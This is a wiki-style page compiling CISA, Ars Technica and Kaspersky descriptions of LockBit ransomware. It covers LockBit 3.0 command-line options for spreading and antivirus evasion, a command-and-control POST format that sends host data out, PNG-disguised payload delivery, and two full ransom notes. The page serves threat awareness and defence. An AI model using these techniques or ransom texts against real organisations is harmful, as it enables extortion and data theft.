LockBit: Difference between revisions

Cybersecurity & Infrastructure Security Agency (2023)

LockBit 3.0, also known as "LockBit Black" is more modular than its previous versions. LockBit 3.0 is configured upon compilation with many different options that determine the behavior of the ransomware. Upon the actual execution of the ransomware within a victim environment, various arguments can be supplied to further modify the behavior of the ransomware.

LockBit command line parameters :

* -pass  (32 character value) : Password used to to launch LockBit 3.0, required.
* -path (file or path) : Only encrypts provided file or folder
* -gspd : Spread via group policy
* -psex : Spread via admin shares
* -safe : Reboot host into Safe Mode, to circumvent endpoint antivirus and detection. 
* -wall : Sets LockBit 3.0 wallpaper and prints out LockBit 3.0 ransom note
* -del : Self-delete after successful ransom payment
* -gdel : Remove LockBit 3.0 group policy changes after successful ransom payment

Password argument is mandatory during the execution of the ransomware. LockBit 3.0 affiliates failing to enter the correct password will be unable to execute the ransomware. By protecting the code in such a manner, LockBit 3.0 hinders malware detection and analysis with the code being unexecutable and unreadable in its encrypted form. Signature-based detections may fail to detect the LockBit 3.0 executable as the executable's encrypted portion will vary based on the cryptographic key used for encryption.

LockBit 3.0 will only infect machines that do not have language settings matching in a defined exclusion list. However, whether a system language is checked at runtime is determined by a configuration flag originally set at compilation time. Languages on the exclusion list include, but are not limited to, Romanian (Moldova), Arabic (Syria) and Tatar (Russia). If a language from the exclusion list is detected, LockBit 3.0 will stop execution without infecting the system.

Affiliates deploying LockBit 3.0 ransomware gain initial access to victim network via phising campaigns, abuse of valid accounts, exploitation of public-facing applications, external remote services^[1] and drive-by compromise ^[2]

Ransom note

~~~ LockBit 3.0 the world's fastest and most stable ransomware from 2019~~~
>>>>> Your data is stolen and encrypted.
If you don't pay the ransom, the data will be published on our TOR darknet sites. Keep in mind that once your data appears on our leak site, it could be bought by your competitors at any second, so don't hesitate for a long time. The sooner you pay the ransom, the sooner your company will be safe.

Communication to the command center server

If configured, Lockbit 3.0 will send two HTTP POST request to one of the command center servers. Information about the victim host and bot are encrypted with an AES key and encoded in base 64

POST <Lockbit C2>/?7F6Da=u5a0TdP0&Aojq=&NtN1W=OuoaovMvrVJSmPNaA5&fckp9=FCYyT6b7kdyeEXywS8I8 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br Content-Type: text/plain
User-Agent: Safari/537.36 <Lockbit User Agent String>
Host: <Lockbit C2>
Connection: Keep-Alive LIWy=RJ51lB5GM&a4OuN=<Lockbit
ID>&LoSyE3=8SZ1hdlhzld4&DHnd99T=rTx9xGlInO6X0zWW&2D6=Bokz&T1guL=MtRZsFCRMKyBmfmqI& 6SF3g=JPDt9lfJIQ&wQadZP=<Base64 encrypted data> Xni=AboZOXwUw&2rQnM4=94L&0b=ZfKv7c&NO1d=M2kJlyus&AgbDTb=xwSpba&8sr=EndL4n0HVZjxPR& m4ZhTTH=sBVnPY&xZDiygN=cU1pAwKEztU&=5q55aFIAfTVQWTEm&4sXwVWcyhy=l68FrIdBESIvfCkvYl
Example of information found in encrypted data
{
"bot_version":"X",
"bot_id":"X",
"bot_company":"X", "host_hostname":"X", "host_user":"X",
"host_os":"X",
"host_domain":"X",
"host_arch":"X",
"host_lang":"X", "disks_info":[
{
"disk_name":"X",
"disk_size":"XXXX", "free_size":"XXXXX"
}

Ars Technica (2020)

Dan Goodin (2020) "LockBit, the new ransomware for hire : A sad and cautionary tale" Ars Technica

Claims :

• ARP tables, server message block, powershell encryptor script disguised as a PNG file, onion sites, jabber
• Alleged Russian ties
• Ransomware as a service, with money-back guarantee

Excerpts

After getting in, LockBit used a dual method to map out and infect victimized network. First, the ARP tables, which map IP addresses to device MAC addresses, helped to locate accessible system. Second, server message block, a protocol used for sharing files and folders among networked machines, allowed the infected nodes to connect to uninfected ones. LockBit would then execute a PowerShell script that spread the ransomware to those machines. The malicious file the PowerShell script downloaded was disguised as a PNG image. In fact, it was a executable program that encrypted the files on the machine.

LockBit had another trick. Before the ransomware encrypted data, it connected to an attacker-controlled server and then used the victim's machine IP address to determine where it was located. If it resided in Russia or another country belonging to the Commonwealth of Independent States, it would abort the process.

Once the data was locked up, organization computers were left with a desktop that contain this message as its wallpaper.

The ransomware note looked like this.

All your important files are encrypted!
Any attempts to restore your files with the thrid-party [sic] software will be fatal for your files!
RESTORE YOU [sic] DATA POSIBLE [sic] ONLY BUYING private key from us.
There is only one way to get your files back:

| 1. Download Tor browser and install it.
| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?E3D94FA5
| 3. Follow the instructions on this page

### Attention! ###
# Do not rename encrypted files.
# Do not try to decrypt using third party software, it may cause permanent data loss.
# Decryption of your files with the help of third parties may cause increased price(they add their fee to our).
# Tor Browser may be blocked in your country or corporate network. Use https://bridges.torproject.org or use Tor Browser over VPN.
# Tor Browser user manual https://tb-manual.torproject.org/about

!!! We also download huge amount of your private data, including finance information, clients personal info, network diagrams, passwords and so on.
Don't forget about GDPR.

Using a Tor site, the organization paid the ransom and, after several hours, used the same anonymous service to obtain the decryption key. Those behind this attack had a support desk that communicated over the anonymized Jabber messenger to resolve several problems the organization had in rebuilding the locked-up network.

LockBit's creators offer a ransomware-as-a-service to customers. LockBit is sold in underground broker forums that often require sellers to put up a deposit that customers can recover in the event the wares don't perform as advertised. In a testament to their confidence and determination, the LockBit sellers have forked out almost $75,000.

Kaspersky

LockBit ransomware - What You need to Know

Claims :

• Past targets since September 2019 (US, India, Indonesia, Ukraine, France, UK, Germany)
• Alleged Russian ties
• Ransomware as a service

Excerpts

Attacks began in September 2019, when it was dubbed the ".abcd virus", a reference to the file extension name used when encrypting a victim's files. Notable past targets include organizations in the United States, India, Indonesia, Ukraine. Additionally various countries throughout Europe (France, UK, Germany) have seen attacks. In its automated vetting process, it seems to also intentionally avoid attacking systems local to Russia or to any other countries within the Commonwealth of Independent States.

LockBit functions as ransomware-as-a-service. Willing parties put a deposit down for the use for custom for-hire attacks, and profit under an affiliate framework. Ransom payments are divided between the LockBit developer team and the attacking affiliates, who receive up to 3/4 of the ransom funds.

Notes